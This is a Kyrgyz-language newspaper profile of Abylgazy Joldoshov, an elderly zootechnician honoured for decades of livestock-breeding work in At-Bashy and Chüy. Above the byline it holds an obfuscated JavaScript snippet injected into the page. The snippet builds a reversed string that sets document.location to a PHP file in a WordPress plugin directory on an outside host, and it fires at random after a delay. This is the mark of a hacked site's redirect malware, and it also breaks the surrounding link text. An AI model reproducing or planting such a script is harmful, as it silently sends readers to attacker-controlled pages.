АК ЭМГЕГИ МЕНЕН АБРОЙ ТАПКАН АБЫЛГАЗЫ АБА

25-февраль, 2022-ж. / Редакция / Жаңылыктар 45

Жакында жашы сексенге таяп калган Абылгазы аксакал редакциябызга баш багып калды. Ал өткөн жылдын аяк ченинде Кыргыз Республикасынын Министрлер Кабинетинин Ардак Грамотасы менен сыйланган экен. Чынында мындай чоң даражалуу сыйлыкка ээ болуу сыймык эмеспи. Ал эми ошол сыйлыктын артында канчалаган эмгек жатканын көпчүлүк биле бербейт.  Абылгазы абанын эмгек жолу тууралуу баштан-аяк мага айтып берген аңгемеси, ал тууралуу макала жазууга түрткү болду. Анын делого тиркелген эмгек жолу жөнүндөгү маалыматтар да, анын тыкан адам экенинен кабар берип турду.

Абылгазы Жолдошов 1943-жылы Ат-Башы районунун Кара-Булуң айылында жарык дүйнөгө келип, балалык чагы ушул айылда өткөн. Кол-арага жарап калгандан тартып колхоздун ар кандай майда чарбалык иштерине көмөгүн көрсөтө баштаган. Адегенде илкий баскан өгүз минип, чийне менен арпа эгинин ташыганга жардам берип жүрсө, эс тарткандан тартып ат менен бакан сүйрөтүп, чөмөлө тартат. Ошентип жаштайынан эле кара жумушка бышып, эмгектин даамын тата баштаган. Орто мектепти аяктагандан кийин, 1961-жылы Фрунзе шаарына келип, жүргүнчү ташуучу автобазага слесарь болуп ишке кирет. Ал жерде эки жыл иштегенден кийин 1963-жылы Советтик Армиянын катарына чакырылып, аны 1966-жылы аяктап келген соң айылында дагы эки жыл эсепчи болуп эмгектенет. Ошентип, бир топ турмуштук тажрыйбага ээ болгондон кийин гана 1968-жылы Фрунзедеги Айыл чарба институтунун зоотехникалык факультетине тапшырып өтүп, аны 1973-жылы ийгиликтүү аяктаган соң, кыргыз уяң жүндүү жогорку продукциялуу өндүргүч кочкорлор, “Ала-Тоо” породасындагы өндүргүч букалар багылуучу Республикалык малды асылдандыруу станциясынын кой тармагы боюнча бөлүмдө адегенде зоотехник, 1976-жылдан тартып башкы зоотехник болуп эмгектенген. Чүй өрөөнүндөгү райондордо, көбүнесе Суусамыр өрөөнүндө, Кенес-Анархайда көчмө лабораторияларды уюштурууга, койлорду жасалма жол менен уруктандыруу өнөктүгүн өткөрүүгө жигердүү катышып жүрөт. Ал республиканын аймактарындагы жасалма уруктандыруу заводдорунда, чарбаларында болуп, койлорду бонитировкалоо ишине кол кабыш кылып, практикалык жардамдарды да көрсөтөт.  Анын өзүнүн адистигине жасаган жоопкерчиликтүү мамилеси, аткарган көрүнүктүү иштери 1976-жылы Москвадагы Бүткүл союздук эл чарбасынын жетишкендиктери көргөзмөсүнөн (ВДНХдан) билимин өркүндөтүү үчүн он күндүк семинарга жөнөтүлүшүнө түрткү болот. Андан соң, партиянын Кант райондук комитетинин жолдомосу менен Фрунзедеги марксизм-ленинизм университетин бүтүрөт. Эмгектеги жетишкендиктери үчүн  мекеменин Ардак Грамотасы менен сыйланып, көп жолу алкыш ээси болот. 1977-жылы КПССтин мүчөлүгүнө кабыл алынат. Ал убакта КПССтин мүчөлүгүнө татыктуулардын татыктуулары гана кабыл алынчу. Ошондуктан партияга мүчө болуп кабыл алынышы зор жетишкендик болчу.

1978-жыл Абылгазы абанын эмгек жолундагы бурулуш жыл болуптур. Себеби, ушул жылдын сентябрь айында Айыл чарба министринин орун басары Р.Дыйканбаев аны өзүнө чакырып, “Сиз Ат-Башы районунун айыл чарба башкармалыгына кызматка жөнөтүлүп жатасыз” деп айтат. Дароо макул болот. Ошентип, ал Ат-Башы районунун айыл чарба башкармалыгында башкы зоотехник болуп эмгектене баштайт. Башкы зоотехник катары райондун чарбаларында коомдук малдын породасын жакшыртууга, селекциялык иштерге, малды жасалма жол менен уруктандыруу өнөктүгүнө өзгөчө көңүл бурат. Зоотехникалык илимдин жетишкендиктерин, алдыңкы тажрыйбаларды, ыкмаларды кой, уй, жылкы төлдөтүү, малды багып семиртүү, кой, уйларды жасалма жол менен уруктандыруу, малды кыштатуу өнөктүктөрүндө кеңири колдонот жана булар боюнча малчылар арасында семинарларды өткөрүп турат. Анын натыйжасында чарбалардагы коомдук малдын башын жоготуу азайып, төлдүн саны көбөйгөн.

Советтик мезгилде партиянын чечими  – чечим болгон. Аны аткарбаганга да айла жок болчу. Ошондуктан партиянын райондук комитети 1979-жылы А.Жолдошовду 1-Май колхозуна башкы зоотехник кылып жөнөткөндө ойлонбой туруп макулдугун берген жана колхозго келгенде адатынча ишке баш-оту менен киришип, эгерде мурда малчылар, чабандар менен аралыктан иш алып барган болсо, бул чарбага баргандан кийин алар менен тикелей иштеше турган болду. Короо-сарайларды кыдырып, чабандарга кандай талаптар коюла тургандыгын жакшы билгендиктен, 1-Май бир нече айылдан турган колхоз экен, кыдырып иштөөгө туура келген. Ал убакта машина жетишсиз болгондуктан колхоздон ат сурап алып, бир короодон бир короого атчан барып иштеген. Бирок айылдар ортосундагы аралыктар бири-биринен алыс болгондуктан колхоздун башкармасынан дагы бир ат сурап алып, аттарды алмак-салмак минип малчы-чабандарды кыдырып иштеп жүрдү.  Чарбадагы чабандардын, малчылардын аткарган иштери ойдогудай эмес экенин көрүп зээни кейийт. Жүр-нарыга салып, илең-салаң малчылар да жок эмес экен. Андайларга Абылгазы аба адегенде жол көрсөтүп адистик кеңештерин айтат. Ошого карабастан тоң моюндукка салып, бир нече жолу айтса да Абылгазы абанын айткандарын аткарбай койгон чабан-малчылар менен жакалашканга чейин барган учурлар болуптур. Ал мал чарбасынын продукциялуулугун жогорулатуу үчүн зоотехникалык эрежелердин сакталуусуна жана мал багууда тоюттун жетиштүүлүгүнүн маанилүү экендигине айрыкча көңүл бурган. Анын натыйжасында 1-Май колхозунун мал чарбачылыгынын көрсөткүчтөрү райондо бир кыйла жогорулаган. Абылгазы Жолдошовдун мыкты зоотехник экенин малчы-чабандар баалай башташат. Айылдык кеңешке депутат да болуп шайланат. Бир жолу колхоздун эң алдыңкы чабаны Шерип Жапаров Абылгазы абага кайрылып: “колхоздо канчалаган зоотехниктер иштеп кетишкен, бирок, алардын бирөө да сага окшоп, ат минип алып жума сайын келип чабандардын, малдын ал-жайын сураган  эмес” деп, ыраазычылыгын айткан экен.

Колхоздо эки жылдай иштеген соң, Абылгазы Жолдошовду партиянын Ат-Башы райондук комитети райондук айыл чарба башкармалыгына кайрадан келип башкы зоотехник болуп иштөөгө чакырат. Бул мурда иштеп кеткен мекемеде кайрадан иштеп калуу, ага көп кыйынчылык алып келбеси түшүнүктүү эмеспи. Ошондуктан ал райондук айыл чарба башкармалыгында бир топ жылдар үзүрлүү эмгектенет. 1985-жылы Москвадагы Бүткүл союздук эл чарба жетишкендиктери көргөзмөсүндөгү семинарга катышып келүүгө кайрадан жөнөтүлөт. Ага «Айыл чарбасынын отличниги» төш белгиси ыйгарылат. Эл арасында өз ишин мыкты билген адис жана жүрүш-турушу салабаттуу, терс адаттардан таптакыр алыс адам катары бийик абройго жетишет. Азыркы учурда Абылгазы аба ардактуу эс алууда. Бала-бакырасы менен бактылуу өмүр сүрүүдө.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Абдимухтар АБИЛОВ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 45
Бөлүшүү: Telegram WhatsApp X